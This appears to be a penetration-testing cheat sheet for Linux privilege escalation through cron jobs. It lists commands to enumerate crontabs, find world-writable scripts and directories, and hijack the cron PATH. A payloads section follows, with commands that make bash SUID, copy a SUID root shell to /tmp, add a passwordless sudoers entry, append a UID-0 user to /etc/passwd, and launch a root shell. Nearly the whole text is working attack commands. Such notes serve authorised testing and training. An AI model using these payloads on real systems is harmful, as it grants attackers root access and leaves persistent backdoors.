cronjobs

# List user cron jobs
crontab -l

# List system-wide cron jobs
cat /etc/crontab

# View all system cron files
cat /etc/cron.d/*
cat /etc/cron.daily/*

# Check for anacron jobs
cat /etc/anacrontab

# Check for cron db files
crontab.db

1. Writable scripts

#writable scripts
find /usr/bin/* -type f -perm -o+w -exec ls -l {} \;

# Replace with malicious content
echo '#!/bin/bash' > /path/to/script.sh
echo 'chmod +s /bin/bash' >> /path/to/script.sh
# OR
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/script.sh
# OR
echo 'echo "user ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers' >> /path/to/script.sh

1. Writable directory

find /usr/bin -type d -perm -o+w -exec ls -ld {} \;

# Replace script with malicious version
mv /path/to/script.sh /path/to/script.sh.backup
cat > /path/to/script.sh << 'EOF'
#!/bin/bash
chmod +s /bin/bash
EOF
chmod +x /path/to/script.sh

1. PATH edit

# Check cron PATH variable
grep PATH /etc/crontab

# Create malicious binary in writable PATH directory
echo '#!/bin/bash' > /tmp/systemctl
echo 'chmod +s /bin/bash' >> /tmp/systemctl
chmod +x /tmp/systemctl

Payloads

/# SUID bash
echo 'chmod +s /bin/bash' > /tmp/privesc.sh

# Copy bash with SUID
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > /tmp/privesc.sh

# Add to sudoers
echo 'echo "user ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers' > /tmp/privesc.sh

# Create root user
echo 'echo "root2:x:0:0:root:/root:/bin/bash" >> /etc/passwd' > /tmp/privesc.sh

/bin/bash -p
# OR
/tmp/rootbash -p